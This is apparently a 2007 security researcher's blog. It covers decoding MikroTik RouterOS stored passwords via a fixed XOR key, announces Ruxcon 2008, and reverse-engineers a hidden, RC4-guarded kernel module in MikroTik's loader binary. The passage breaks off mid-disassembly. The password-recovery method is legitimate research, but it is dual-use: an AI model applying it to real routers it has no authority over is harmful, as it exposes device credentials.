Initially, we can note that :

This made me think it was something trivial such as an XOR based scheme.

If it is, we can work out what the first XOR byte is by:

>>> hex(0x78 ^ ord('0'))
'0x48'

This works due to the properties of XOR.

Continuing on with our analysis / assumption that it is XOR on the second char, we take the suspected xor byte of 0xbf, and XOR them against the decimal value of a and l

>>> hex(0xbf ^ ord('a'))
'0xde'
>>> hex(0xbf ^ ord('l'))
'0xd3'

As we can see, the returned bytes are the same as the second bytes from the "hash" from aaa and ala respectively.

Since we now know the "encryption" key, we can write a decoder trivially. (As a side note, I like Python's doctest module :) )

$ python mikrotik_password.py 29 de bf 06 49 5a 0e 2d 09 d5 fb 27 b1 44 ec 93 01
aaa

The password decoder can be found here for those who care.

I do not know if the encryption key changes on different releases of RouterOS, or if it is dependant upon license key or anything like that - this was coded with the information manio (lowercased upon his request) provided to me. manio said that he would investigate this when he gets a chance.

Ruxcon 2008

(added 20/11/2007)

Despite what many have thought, ruxcon will be making a comeback in 2008 :) Not too much has been planned at the moment, but by the looks of it, things are back on track. Somewhat recently, a ddos kiddie from South Australia packeted the box, causing the hosting provider to null route the ip… however that issue was sorted out.

I will be attempting to do a talk at ruxcon, not sure exactly what, but probably regarding hardened linux, and covering such things as PaX / grsecurity and other assorted things.

Depending on how things are going, I will probably set up a capture the flag game as well.

If you are interested in speaking at Ruxcon 2008, drop a note to chris@ruxcon.org.au indicating your interest.

Hope to see you all there :D

MikroTik Router Security Analysis: Uncovering a hidden kernel module in a binary

(started 28/8/2007, added 11/10/2007)

The MikroTik Wireless Router is a Linux embedded wireless router, focusing on various functionality such as bandwidth management, Firewalling, VPN server/client, and various other things. As with all embedded linux based software, it is interesting to pull it apart :)

It has been around for a while now… a couple of years ago when I analysed the software / pulling it apart, it had drivers/firmware to turn standard Orinoco wireless cards into an Access Point (which as far as I know isn't possible otherwise, at least not when I was looking at it.)

For the purposes of this article, I am looking at mikrotik-2.9.46.iso (MD5sum: 65aa908dd748ccf72ad9f588613dfe31, SHA1sum: 5e5ed13498db8d9745a701f75e58da3ef6701e58). For the most part, I have used QEMU to emulate the hardware/software environment to install it on. This has several advantages, such as being able to edit the "disk" it's using easily, amongst other things.

Performing active analysis of MikroTik router components

To perform more active analysis of the MikroTik components, we could copy the applicable binaries and associated libraries to another linux platform. This would allow us to strace the binary, debug it (which is incredibly useful for exploit development), and monitor the activities it performs in general. Furthermore, we can copy the kernel and applicable modules to perform further analysis on them, and to allow the environment to be replicated a lot better.

The analysis environment / setup

For this article, I have done a basic network install of Debian 4rc1. After performing the installation and installing a bunch of generic tools (strace/gdb/gcc/ltrace/openssh-server/nasm/etc), I then extracted the Mikrotik kernel and modules, and put the applicable files into their place.

[box] # wget http://felinemenace.org/~andrewg/MikroTik_Router_Security_Analysis_Part1/MikroTik-2.9.46-kernel-initrd.tgz
--08:58:00-- http://felinemenace.org/~andrewg/MikroTik_Router_Security_Analysis_Part1/MikroTik-2.9.46-kernel-initrd.tgz
           => `MikroTik-2.9.46-kernel-initrd.tgz'
Resolving felinemenace.org... 69.55.233.10
Connecting to felinemenace.org|69.55.233.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,832,960 (1.7M) [application/x-gzip]

100%[====================================>] 1,832,960    327.68K/s    ETA 00:00

08:58:06 (330.42 KB/s) - `MikroTik-2.9.46-kernel-initrd.tgz' saved [1832960/1832960]
[box] # tar xzf MikroTik-2.9.46-kernel-initrd.tgz
[box] # mv lib/modules/2.4.31/ /lib/modules/2.4.31
[box] # mv boot/vmlinuz /boot/vmlinuz-2.4.31
[box] # cd /boot/grub/
[box] # cat >>menu.lst <<_EOF_
> title MikroTik 2.4.31 / 2.9.46
> root            (hd0,0)
> kernel /boot/vmlinuz-2.4.31
>
> _EOF_
[box] # sync ; reboot

While the QEMU image was rebooting, I wondered if it would work, due to differences in 2.6 and 2.4 kernels.. Firstly though, it appeared I may have to experiment with initrd images to load the applicable drivers for it and generally mess around as when booting it displayed:

  Booting 'MikroTik 2.4.31 / 2.9.46'

root                    (hd0,0)
 Filesystem type is ext2fs, partition type is 0x83
kernel /boot/vmlinuz-2.4.31
    [Linux-bzImage, setup=0x1400, size=0xa044d]

Uncompressing Linux... Ok, booting the kernel.
Kernel panic: VFS: Unable to mount root fs on 09:00

Booting back into the standard Debian kernel:

[box] # cd /boot/
[box] # cp /root/boot/initrd.rgz mikro-initrd.rgz
[box] # cd grub/
[box] # echo initrd /boot/mikro-initrd.rgz >>menu.lst
[box] # sync ; reboot

Unfortunately, this gives a similar error message before. We know previously from mounting the mikrotik root filesystem it was ext3, but we can (attempt) to verify what filesystems they support. Looking over the original find output for the kernel modules, we don't see any filesystem modules for the default ext2 filesystem.

We can verify the filesystems supported by analysing the vmlinuz file. To summarise, basically, this file contains some bootup to get the machine into a decent state, a gzip decompression routine, and a heap of compressed data. The information we're interested in is in the compressed data, so we have to decompress it. As it's not a standard gzip file, we can't just run gunzip on it and be done with it, we need extract the compressed data.

Fortunately, this can be done rather easily because the the gzip header / magic bytes, which allows us to find suitable offsets to attempt decompression. The gzip magic bytes can be found by doing:

[box] # cd /tmp
[box] # cp /etc/passwd .
[box] # gzip passwd
[box] # xxd passwd.gz  | head
0000000: 1f8b 0808 2061 d346 0003 7061 7373 7764  .... a.F..passwd
0000010: 0065 93c1 6ec2 300c 86ef 3c05 c74d 0285  .e..n.0...<..M..
0000020: 5260 90e3 3469 9771 d99e c06d 4289 d626  R`..4i.q...mB..&
0000030: 55d2 5278 fbd9 71a0 4593 adc8 7ffc 2536  U.Rx..q.E.....%6
0000040: 0ef5 ce75 f22a 5768 9e42 c16b 61ac 2820  ...u.*Wh.B.ka.(
0000050: 9c67 0a74 e32c 1219 5a12 a20f 5e04 4498  .g.t.,..Z...^.D.
0000060: 438a e2ab 5ca3 dd77 1fa9 700b 98ca d128  C...\..w..p....(
0000070: 124a 5f26 295b 626e 2377 db6d be91 514e  .J_&)[bn#w.m..QN
0000080: cea2 9c55 d068 3abf 95bb 9564 11ab a730  ...U.h:....d...0
0000090: 5dd4 0095 dfc9 6c2d 2914 17f0 a284 f2ac  ].....l-).......

For the purpose on hand, we'll use 0x1f8b as our marker.

[box] # xxd /boot/vmlinuz-2.4.31 | egrep "\b1f8b|1f\b \b8b" | head -n 5
00049a0: a9d0 0900 1f8b 0800 b533 bc46 0203 ec5d  .........3.F...]
0004f20: 3613 e31f 8b6d a730 ef6f 1078 d415 4401  6....m.0.o.x..D.
001c6c0: 0a1f 8bab 69a2 a7e5 533b 4d60 764f 93bc  ....i...S;M`vO..
00381b0: c3ba d727 7964 631f 8baf 810c 2704 206f  ...'ydc.....'. o
003fdf0: 972f d2d6 d50e 5d37 180b 771f 8bc5 b43d  ./....]7..w....=

To extract the the compressed data from the vmlinuz-2.4.31 file, dd does the trick easily. We'll start from our first match and work our way down.

[box] # dd if=/boot/vmlinuz-2.4.31 of=vmlinuz.gz bs=1 skip=$((0x49a4))
662093+0 records in
662093+0 records out
662093 bytes (662 kB) copied, 16.0954 seconds, 41.1 kB/s
[box] # file vmlinuz.gz
vmlinuz.gz: gzip compressed data, from Unix, last modified: Fri Aug 10
19:45:25 2007, max compression
[box] # gunzip vmlinuz.gz
[box] # strings -a vmlinuz
... skip ...

After seeing various ext2 related things, I realised it was probably a problem with something else. Reviewing grub's menu.lst, it becomes obvious:

title           Debian GNU/Linux, kernel 2.6.18-5-686
root            (hd0,0)
kernel          /boot/vmlinuz-2.6.18-5-686 root=/dev/hda1 ro
initrd          /boot/initrd.img-2.6.18-5-686
savedefault
.... skip...
title MikroTik 2.4.31 / 2.9.46
root            (hd0,0)
kernel /boot/vmlinuz-2.4.31

initrd /boot/mikro-initrd.rgz

The kernel line for the MikroTik entry misses out on some parameters. Fixing the applicable line, (kernel /boot/vmlinuz-2.4.31 root=/dev/hda1 ro single) and rebooting, it works. At least the decompressing of the kernel image can come in use for further investigation work. One last thing to note is that it requires the debian modutils package to work with 2.4 kernels.

Anyways, moving on, the debian image boots up and works reasonably with their kernel / modules. I had to load the ne2k-pci module manually (via modprobe ne2k-pci) to bring up networking under QEMU.

Another issue I had under the debian/mikrotik hybrid I created, was that the MikroTik kernel does not have AF_UNIX/AF_FILE support built-in, so useful programs like sysklogd and sshd would not run by default… However, it ships this as a module, so modprobe unix took care of this issue.

In order to run the MikroTik binaries (/nova/bin/), I needed to copy various files. I copied /nova/ over, and made a directory called /lib_mikro/ where I could copy various libary files over that resided in the /lib directory on the MikroTik installation.

In order to use these libraries in a non-standard directory location, the environment variable LD_LIBRARY_PATH can be set. This way only the applicable MikroTik binaries can be ran with correct library versions.

Examining the fileman binary

Doing some prelimiary analysis on the fileman binary shows that it appears to be expecting a network file descriptor on fd 3.

[box] $ LD_LIBRARY_PATH=/lib_mikro/ strace -f ./fileman
execve("./fileman", ["./fileman"], [/* 14 vars */]) = 0
uname({sys="Linux", node="debian", ...}) = 0
brk(0)                                  = 0x805861c
...
rt_sigaction(SIGFPE, {0x4002c8ca, [], SA_RESTORER|SA_RESTART|SA_SIGINFO,
0x4009d4c0}, NULL, 8) = 0
getsockname(3, 0xbffffd18, [110])       = -1 EBADF (Bad file descriptor)
socket(PF_FILE, SOCK_STREAM, 0)         = -1 EAFNOSUPPORT (Address family not
supported by protocol)
exit_group(1)                           = ?
Process 2147 detached

Unfortunately, debian's version of bash does not have /dev/tcp/ support, so unfortunately it's not as easy as nc -l 12121 on one terminal, and … ./fileman 3</dev/tcp/blah/.

After quickly writing some code to do what's needed, we can run fileman (and probably others). It's available here if you would like it. Usage is simple, python fd3.py <program to execute> <arguments for program>. Note that the first argument you specify for the program is argv[0] - not argv[1]. An example of a command line would be python fd3.py /usr/bin/strace strace -f /path/to/program.

Another issue appeared when trying to run fileman with a valid file descriptor on fd 3 - it wanted /tmp/novasock to be a valid file descriptor:

[box] $ LD_LIBRARY_PATH=/lib_mikro fd3 `which strace` strace -f ./fileman
getsockname(3, {sa_family=AF_INET, sin_port=htons(31313), sin_addr=inet_addr("192.168.254.3")}, [16]) = 0
socket(PF_FILE, SOCK_STREAM, 0)         = 4
connect(4, {sa_family=AF_FILE, path="/tmp/novasock"}, 110) = -1 ENOENT (No such file or directory)
close(4)                                = 0
exit_group(1)                           = ?

Looking for /tmp/novasock we find the the loader binary seems to have what we're after:

[box] $ strings -f * | grep novasock
loader: /tmp/novasock
Analysing kernel module and userland interaction

Performing some initial analysis via strace on loader reveals an interesting / startling behaviour in loader:

[box] $ LD_LIBRARY_PATH=/lib_mikro strace -f ./loader
...
[pid  2361] create_module("qwink", 1430) = 0xc8831000
[pid  2361] init_module(0x80553fc, 134587376, umovestr: Input/output error
0xa7) = 0
[pid  2361] delete_module("qwink")      = 0
...

The interesting thing about this particular piece of code is that it is loading a linux kernel module (LKM), and immediately removes the kernel module. This is particularly interesting as it would appear to be a kernel module that's meant to be out of sight.

To dump the module, we could hook init_module to perform our required actions, however, first we have to verify it's easily possible:

[box[ $ objdump -R loader  | grep -i module
[box] $

This is interesting, as it appears to not be importing the various module library calls, performing some more analysis:

[box] $ objdump -dtrs loader | grep module
...
 804fb69:       e8 3a 42 00 00          call   8053da8 <delete_module+0x336>
08053a20 <create_module>:
 8053a36:       76 0c                   jbe    8053a44 <create_module+0x24>
08053a49 <init_module>:
...

The interesting thing about this output is the sections where the module names are surrounded by the angle brackets; this indicates that those functions exist in the .text of loader:

08053a49 <init_module>:
 8053a49:       55                      push   %ebp
 8053a4a:       b8 80 00 00 00          mov    $0x80,%eax
 8053a4f:       89 e5                   mov    %esp,%ebp
 8053a51:       53                      push   %ebx
 8053a52:       8b 4d 0c                mov    0xc(%ebp),%ecx
 8053a55:       8b 5d 08                mov    0x8(%ebp),%ebx
 8053a58:       cd 80                   int    $0x80
 8053a5a:       83 f8 82                cmp    $0xffffff82,%eax
 8053a5d:       89 c3                   mov    %eax,%ebx
 8053a5f:       76 0c                   jbe    8053a6d <init_module+0x24>
 8053a61:       f7 db                   neg    %ebx
 8053a63:       e8 54 70 ff ff          call   804aabc <__errno_location@plt>
 8053a68:       89 18                   mov    %ebx,(%eax)
 8053a6a:       83 cb ff                or     $0xffffffff,%ebx
 8053a6d:       89 d8                   mov    %ebx,%eax
 8053a6f:       5b                      pop    %ebx
 8053a70:       5d                      pop    %ebp
 8053a71:       c3                      ret

This appears to be a standard implementation of the _syscallX() macros in the asm/unistd.h. While we're staring at objdump -d output, we may as well look at where this code is (statically) being called from:

 8053ea6:       ff 75 dc                pushl  0xffffffdc(%ebp)
 8053ea9:       ff 35 20 64 05 08       pushl  0x8056420
 8053eaf:       e8 95 fb ff ff          call   8053a49 <init_module>

At 0x8053ea9 it pushes a static address (0x8056420) which does not correspond to our strace output. Having a brief look at where that variable is used before hand:

[box] $ objdump -dtrsRS loader | grep -C 2 8056420
...
 8053db4:       83 ec 18                sub    $0x18,%esp
 8053db7:       c7 45 f0 00 00 00 00    movl   $0x0,0xfffffff0(%ebp)
 8053dbe:       8b 3d 20 64 05 08       mov    0x8056420,%edi
 8053dc4:       ba 10 00 00 00          mov    $0x10,%edx
 8053dc9:       f2 ae                   repnz scas %es:(%edi),%al
--
 8053e19:       e8 3e 70 ff ff          call   804ae5c <memcpy@plt>
 8053e1e:       53                      push   %ebx
 8053e1f:       ff 35 20 64 05 08       pushl  0x8056420
 8053e25:       56                      push   %esi
 8053e26:       e8 31 70 ff ff          call   804ae5c <memcpy@plt>
 8053e2b:       ff 75 ec                pushl  0xffffffec(%ebp)
 8053e2e:       ff 35 20 64 05 08       pushl  0x8056420
 8053e34:       e8 e7 fb ff ff          call   8053a20 <create_module>
 8053e39:       83 c4 24                add    $0x24,%esp
--
 8053ea1:       e8 57 fd ff ff          call   8053bfd <delete_module+0x18b>
 8053ea6:       ff 75 dc                pushl  0xffffffdc(%ebp)
 8053ea9:       ff 35 20 64 05 08       pushl  0x8056420
 8053eaf:       e8 95 fb ff ff          call   8053a49 <init_module>
 8053eb4:       83 c4 10                add    $0x10,%esp
--
 8053ee0:       83 c4 0c                add    $0xc,%esp
 8053ee3:       8b 55 f0                mov    0xfffffff0(%ebp),%edx
 8053ee6:       ff 35 20 64 05 08       pushl  0x8056420
 8053eec:       39 c2                   cmp    %eax,%edx
 8053eee:       0f 94 c3                sete   %bl

So, it appears it's used a bit to set it up. Being the somewhat lazy type, it would be easy enough to write a dynamic library to modify the .text segment to insert a hook. The mechanisms used for this is discussed in a paper I wrote available here.

The hook code aim is simple, which is to dump the applicable information sent to init_module. It also appears that the init_module function declaration changes between 2.4 and 2.6 kernel versions:

2.4:
 *`int init_module(const char *name, struct module *image);`
.2.6:
 * `long sys_init_module (void *umod, unsigned long len, const char *uargs);`

The strace output above is for 2.6, not 2.4. After locating a suitable 2.4 init_module man page, we see that the second parameter is a pointer to a structure:

The module image begins with a module structure and is followed by code and data as appropriate.  The module structure is defined as follows:

struct module {
  unsigned long         size_of_struct;
  struct module        *next;
  const char           *name;
  unsigned long         size;
  long                  usecount;
  unsigned long         flags;
  unsigned int          nsyms;
  unsigned int          ndeps;
  struct module_symbol *syms;
  struct module_ref    *deps;
  struct module_ref    *refs;
  int                 (*init)(void);
  void                (*cleanup)(void);
  const struct exception_table_entry *ex_table_start;
  const struct exception_table_entry *ex_table_end;
#ifdef __alpha__
  unsigned long gp;
#endif
};

At least the required information is available to make it easier. After writing the required the code (which is available here)

Running our hooking library code (which is available , we get:

[box] $ LD_LIBRARY_PATH=/lib_mikro LD_PRELOAD=/tmp/hook-loader.so ./loader
forked
creating loader
--> In an int3 handler
--> Create module return address is 0xc8831000
--> In an int3 handler
--> working our magic for qwink

Matching the dumped header information with the struct module output, we get:

[box] $ xxd /tmp/module_header
0000000: 3c00 0000 0000 0000 9015 83c8 9605 0000  <...............
0000010: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000020: 0000 0000 0000 0000 0000 0000 4010 83c8  ............@...
0000030: 0000 0000 0000 0000 0000 0000            ............
... matching up with the above struct module ...
size_of_struct: 0x0000003c      (0x0000)
next: NULL                      (0x0004)
name: 0xc8831590                (0x0008)
size: 0x00000596                (0x000c)
usecount: NULL                  (0x0010)
flags: 0                        (0x0014)
nsyms: 0                        (0x0018)
ndeps: 0                        (0x001c)
syms: NULL                      (0x0020)
deps: NULL                      (0x0024)
refs: NULL                      (0x0028)
init: 0xc8831040                (0x002c)
cleanup: NULL                   (0x0030)
ex_table_start: NULL            (0x0034)
ex_table_end: NULL              (0x0038)

So, our output in /tmp/module_text starts at 0xc883103c, and is 1430 bytes long. Disassembling the binary dump in /tmp/module_text, looking for the init function pointer that gets called:

[box] $ ndisasm -b 32 -o $((0xc883103c)) /tmp/module_text
...
C8831040  83EC18            sub esp,byte +0x18
C8831043  53                push ebx
C8831044  E8F7040000        call 0xc8831540
C8831049  8D5818            lea ebx,[eax+0x18]
C883104C  C7430400000000    mov dword [ebx+0x4],0x0
C8831053  C7401800000000    mov dword [eax+0x18],0x0
...

We can combine the gdb debugging functionality in qemu in conjunction with a disassembler such as IDA Pro , we can use the gdb stub functionality of qemu, we can disassemble and follow what is happening when the init code is executed.

Testing our analysis against the init function by setting break points on:

Just to make sure we catch everything.. I don't expect 0xc053ffd0 to be hit, but it is a valid kernel address :)

Testing the theory out under gdb/qemu doesn't pan out how it was expected to be:

(gdb) break *0xc053ffd0
Breakpoint 4 at 0xc053ffd0
(gdb) break *0xc8831040
Breakpoint 5 at 0xc8831040
(gdb) c
Continuing.

... Run the loader program ...

Breakpoint 5, 0xc8831040 in ?? ()
(gdb) x/10i $eip
0xc8831040:     sub    $0x18,%esp
0xc8831043:     push   %ebx
0xc8831044:     call   0xc8831540
0xc8831049:     lea    0x18(%eax),%ebx
0xc883104c:     movl   $0x0,0x4(%ebx)
0xc8831053:     movl   $0x0,0x18(%eax)
0xc883105a:     mov    0xc0252024,%eax
0xc883105f:     inc    %eax
0xc8831060:     mov    %eax,0x8(%ebx)
0xc8831063:     call   0xc8831090
(gdb) i r ebx
ebx            0xc8831000       -930934784

Now that we're able to trace this code, we should work out what information would be desirable to make this process far easier:

Another couple of things we could try to help our reversing efforts:

[box] $ cat /proc/version
Linux version 2.4.31 (build@builder2) (gcc version 2.95.4 20011002 (Debian prerelease)) #1 Fri Aug 10 12:43:55 EEST 2007

After some researching, it was determined that the gcc version 2.95.4 20011002 is available if a default install of Debian 3.0r1 is installed. I only needed cd1 and cd2 from the set of cd's to install the required tools.

After performing a compile of the default kernel configuration shipped in 2.4.31 sans PCMCIA support, I used the 2pelf tool available here to generate the signatures off the .o files in the linux tree, then used the IDA tool sigmake to generate the signature information. (I love bash scripting to automate these tasks).

If needed, the signatures could be regenerated several times with different compilation parameters in order to increase success of signature matching.

Since it would be helpful to have a full kernel text image in IDA Pro, we can use the memsave function in QEMU to generate an appropriate memory dump. To get the most useful memory dump, I'll generate the dump when qemu has hit the breakpoint on the "qwink" init function.

The vmlinux file generated when I compiled the 2.4.31 kernel indicated that the kernel got loaded at 0xc0100000, so we'll dump from there to 0xd0000000… This actually turned out to be a bad idea, as IDA couldn't analyse such large files. After some experimentation and looking at the output of objdump -fp on the compiled vmlinux file, I dumped from 0xc0100000 to 0xc1000000.

(qemu) memsave 3222274048 15728640 d
*pause*
(qemu)

The first number is 0xc0100000 and the second is 0xc1000000 - 0xc0100000.

After dumping the kernel memory to disk, then loading it into IDA, and applying the signatures that was generated before, we see a lot of function names pop up. Sometimes they're correct, sometimes they don't appear to be, sometimes they don't find functions we find interesting, but in general they save us a lot of work :)

The init code is as follows from IDA:

seg001:C8831040 module_init_code:
seg001:C8831040                 sub     esp, 18h
seg001:C8831043                 push    ebx
seg001:C8831044                 call    GET_C8831550    ; eax = 0xc8831550
seg001:C8831049                 lea     ebx, [eax+18h]  ; ebx = eax + 0x18 = 0xc8831568, this is struct timer_list data
seg001:C883104C                 mov     dword ptr [ebx+4], 0 ; sets next pointer to null
seg001:C8831053                 mov     dword ptr [eax+18h], 0 ; sets prev pointer to null ?
seg001:C883105A                 mov     eax, ds:jiffies
seg001:C883105F                 inc     eax             ; schedules the code to be executed in one jiffie
seg001:C8831060                 mov     [ebx+8], eax    ; sets the scheduler expires
seg001:C8831063                 call    GET_C88310a0
seg001:C8831068                 mov     [ebx+10h], eax  ; function pointer used (execd_by_timer) below
seg001:C883106B                 mov     eax, 0FFFFE000h
seg001:C8831070                 and     eax, esp        ; get current
seg001:C8831072                 mov     [ebx+0Ch], eax  ; data pointer for call back. current task
seg001:C8831075                 add     esp, -0Ch       ; no idea what it's doing here. possibly aligning stack to paragraph boundary?
seg001:C8831078                 mov     eax, offset add_timer
seg001:C883107D                 push    ebx             ; push offset to struct timer_list data
seg001:C883107E                 call    eax ; add_timer
seg001:C8831080                 xor     eax, eax        ; return NULL
seg001:C8831082                 add     esp, 10h
seg001:C8831085                 pop     ebx
seg001:C8831086                 add     esp, 18h
seg001:C8831089                 retn

Having a look at the IDA loader binary, we see:

Example: Loader: load_module_into_kernel
.text:08053DA8 load_module_into_kernel proc near       ; CODE XREF: sub_804DD20+25p
.text:08053DA8                                         ; sub_804F572+10Dp ...
.text:08053DA8
.text:08053DA8 constructed_image= dword ptr -24h
.text:08053DA8 roundup_size    = dword ptr -20h
.text:08053DA8 start_of_module_data= dword ptr -18h
.text:08053DA8 total_size      = dword ptr -14h
.text:08053DA8 kernel_modified_variable= dword ptr -10h
.text:08053DA8 var_C           = dword ptr -0Ch
.text:08053DA8 tv_usecs_challenge= dword ptr  8
.text:08053DA8
.text:08053DA8                 push    ebp
.text:08053DA9                 cld                     ; clear direction flag
.text:08053DAA                 mov     ebp, esp
.text:08053DAC                 push    edi
.text:08053DAD                 xor     eax, eax
.text:08053DAF                 push    esi
.text:08053DB0                 or      ecx, 0FFFFFFFFh
.text:08053DB3                 push    ebx
.text:08053DB4                 sub     esp, 18h
.text:08053DB7                 mov     [ebp+kernel_modified_variable], 0 ; initialise the variable written to by access_process_vm to 0
.text:08053DBE                 mov     edi, module_name
.text:08053DC4                 mov     edx, 10h
.text:08053DC9                 repne scasb
.text:08053DCB                 mov     ebx, ecx
.text:08053DCD                 mov     eax, 3Ch
.text:08053DD2                 not     ebx             ; embedded strlen()
.text:08053DD4                 call    sub_8053D95     ; calcuate if additional space is needed in a memory copy later on
.text:08053DD9                 mov     [ebp+roundup_size], eax ; save the calcutation for later use
.text:08053DDC                 lea     edx, [eax+ebx+1360] ; calcuate total size needed, + 1360
.text:08053DE3                 push    edx             ; size
.text:08053DE4                 mov     [ebp+total_size], edx
.text:08053DE7                 call    _malloc         ; allocate the required space
.text:08053DEC                 mov     [ebp+constructed_image], eax ; save the results of malloc()
.text:08053DEF                 mov     ecx, [ebp+total_size]
.text:08053DF2                 cld                     ; clear direction flag
.text:08053DF3                 mov     edi, eax
.text:08053DF5                 xor     eax, eax        ; write nulls
.text:08053DF7                 rep stosb               ; embedded memset
.text:08053DF9                 push    510h            ; size_t
.text:08053DFE                 mov     edi, [ebp+constructed_image] ; get the allocated memory
.text:08053E01                 add     edi, [ebp+roundup_size] ; move past the module structure
.text:08053E04                 push    offset module_init_code ; void *
.text:08053E09                 lea     edx, [edi+510h] ; edx now points PAST the module_init_code and all that
.text:08053E0F                 push    edi             ; void *
.text:08053E10                 lea     esi, [edi+1360] ; esi = module name pointer
.text:08053E16                 mov     [ebp+start_of_module_data], edx
.text:08053E19                 call    _memcpy         ; copy the module_init_code (of length 0x510)
.text:08053E19                                         ; to the allocated memory
.text:08053E1E                 push    ebx             ; size_t. this is calcuated previously from strlen(module_name)
.text:08053E1F                 push    module_name     ; void *
.text:08053E25                 push    esi             ; points to module name
.text:08053E26                 call    _memcpy         ; setup module name
.text:08053E2B                 push    [ebp+total_size] ; int
.text:08053E2E                 push    module_name     ; name
.text:08053E34                 call    create_module
.text:08053E39                 add     esp, 24h
.text:08053E3C                 cmp     eax, 0FFFFFFFFh ; eax contains base of the allocated kernel memory
.text:08053E3F                 jnz     short loc_8053E48
.text:08053E41                 push    offset aFailedToCreate ; "failed to create module"
.text:08053E46                 jmp     short loc_8053EC0
.text:08053E48 ; ---------------------------------------------------------------------------
.text:08053E48
.text:08053E48 loc_8053E48:                            ; CODE XREF: load_module_into_kernel+97j
.text:08053E48                 mov     ecx, [ebp+constructed_image]
.text:08053E4B                 mov     dword ptr [ecx], 3Ch ; set size of module header to 0x3c
.text:08053E51                 mov     ecx, [ebp+roundup_size]
.text:08053E54                 lea     edx, [eax+ecx]  ; edx = start of module code, in kernel space
.text:08053E57                 mov     ecx, [ebp+constructed_image]
.text:08053E5A                 lea     eax, [edx+1360] ; eax = end of module code, start of "qwink"
.text:08053E60                 mov     [ecx+2Ch], edx  ; set module size
.text:08053E63                 mov     edx, [ebp+tv_usecs_challenge] ; arg_0 = tv.tv_usecs ?
.text:08053E66                 mov     [ecx+8], eax    ; write the name pointer, points to end of module, "qwink"
.text:08053E69                 mov     eax, [ebp+total_size]
.text:08053E6C                 mov     [edi+510h], edx ; write challenge to kernel image (data section)
.text:08053E72                 mov     [ecx+0Ch], eax  ; write size of complete module to header
.text:08053E75                 mov     ecx, [ebp+start_of_module_data]
.text:08053E78                 mov     eax, kernel_ptr_c0105000
.text:08053E7D                 mov     [ecx+4], eax
.text:08053E80                 mov     eax, dword_8056A68 ; some mystical value
.text:08053E85                 mov     [ecx+8], eax
.text:08053E88                 mov     eax, dword_8056A6C ; 0x3f
.text:08053E8D                 mov     [ecx+0Ch], eax
.text:08053E90                 lea     eax, [ebp+kernel_modified_variable] ; get the address of the variable
.text:08053E93                 mov     [ecx+10h], eax  ; variable that is going to be written to
.text:08053E96                 call    alloc_rc4_t
.text:08053E9B                 push    [ebp+start_of_module_data]
.text:08053E9E                 mov     esi, eax
.text:08053EA0                 push    eax
.text:08053EA1                 call    rc4_init_key_encrypt ; (rc4_t, start_of_module_data)
.text:08053EA6                 push    [ebp+constructed_image] ; image
.text:08053EA9                 push    module_name     ; name
.text:08053EAF                 call    init_module
.text:08053EB4                 add     esp, 10h
.text:08053EB7                 test    eax, eax
.text:08053EB9                 jz      short loc_8053EC9
.text:08053EBB                 push    offset aFailedToLoadMo ; "failed to load module"
.text:08053EC0
.text:08053EC0 loc_8053EC0:                            ; CODE XREF: load_module_into_kernel+9Ej
.text:08053EC0                 call    _puts
.text:08053EC5                 xor     eax, eax
.text:08053EC7                 jmp     short loc_8053EFE
.text:08053EC9 ; ---------------------------------------------------------------------------
.text:08053EC9
.text:08053EC9 loc_8053EC9:                            ; CODE XREF: load_module_into_kernel+111j
.text:08053EC9                                         ; load_module_into_kernel+126_j
.text:08053EC9                 mov     eax, [ebp+kernel_modified_variable]
.text:08053ECC                 test    eax, eax
.text:08053ECE                 jz      short loc_8053EC9 ; while the variable hasn't been modified, loop. Ugh.
.text:08053ED0                 push    offset unk_8056960 ; not sure yet
.text:08053ED5                 xor     ebx, ebx
.text:08053ED7                 push    [ebp+tv_usecs_challenge] ; challenge
.text:08053EDA                 push    esi             ; rc4 structure, returned from rc4_init
.text:08053EDB                 call    check_challenge_response
.text:08053EE0                 add     esp, 0Ch
.text:08053EE3                 mov     edx, [ebp+kernel_modified_variable]
.text:08053EE6                 push    module_name     ; name
.text:08053EEC                 cmp     edx, eax        ; result from check_challenge_response
.text:08053EEE                 setz    bl              ; set return code if they're the same
.text:08053EF1                 call    delete_module
.text:08053EF6                 push    esi
.text:08053EF7                 call    free_rc4_t_tailcall
.text:08053EFC                 mov     eax, ebx        ; set return value (based on check_challenge_response)
.text:08053EFE
.text:08053EFE loc_8053EFE:                            ; CODE XREF: load_module_into_kernel+11Fj
.text:08053EFE                 lea     esp, [ebp-0Ch]
.text:08053F01                 pop     ebx
.text:08053F02                 pop     esi
.text:08053F03                 pop     edi
.text:08053F04                 pop     ebp
.text:08053F05                 retn
.text:08053F05 load_module_into_kernel endp
.text:08053F05
Example: Loader: check_challenge_response
.text:08053CEA check_challenge_response proc near      ; CODE XREF: load_module_into_kernel+133p
.text:08053CEA
.text:08053CEA local_rc4_structure= dword ptr -14h
.text:08053CEA challenge_copy  = dword ptr -10h
.text:08053CEA var_C           = dword ptr -0Ch
.text:08053CEA rc4_t           = dword ptr  8
.text:08053CEA challenge       = dword ptr  0Ch
.text:08053CEA unknown_data    = dword ptr  10h
.text:08053CEA
.text:08053CEA                 push    ebp
.text:08053CEB                 mov     ebp, esp
.text:08053CED                 push    edi
.text:08053CEE                 push    esi
.text:08053CEF                 xor     esi, esi
.text:08053CF1                 push    ebx
.text:08053CF2                 push    ecx
.text:08053CF3                 push    ecx
.text:08053CF4                 mov     edi, [ebp+rc4_t]
.text:08053CF7                 mov     eax, [ebp+challenge]
.text:08053CFA                 push    edi
.text:08053CFB                 mov     [ebp+challenge_copy], eax
.text:08053CFE                 call    rc4_dup_struct
.text:08053D03                 mov     [ebp+local_rc4_structure], eax ; duplicated structure
.text:08053D06                 mov     eax, [ebp+unknown_data]
.text:08053D09                 push    dword ptr [eax+100h] ; offset in 256 bytes
.text:08053D0F                 push    edi             ; rc4 structure passed in
.text:08053D10                 call    rc4_set_key
.text:08053D15                 add     esp, 0Ch
.text:08053D18
.text:08053D18 loc_8053D18:                            ; CODE XREF: check_challenge_response+91j
.text:08053D18                 push    edi
.text:08053D19                 call    rc4_get_byte
.text:08053D1E                 mov     edx, [ebp+local_rc4_structure]
.text:08053D21                 mov     bl, al          ; gets a byte from the rc4 structure which was passed in (and initialised later on)
.text:08053D23                 mov     ecx, esi        ; esi is a loop counter
.text:08053D25                 and     ecx, 3          ; index into key material
.text:08053D28                 movzx   eax, byte ptr [edx+esi] ; index into the duplicated structure
.text:08053D2C                 mov     edx, [ebp+unknown_data]
.text:08053D2F                 movzx   eax, byte ptr [edx+eax] ; get a byte of the unknown data
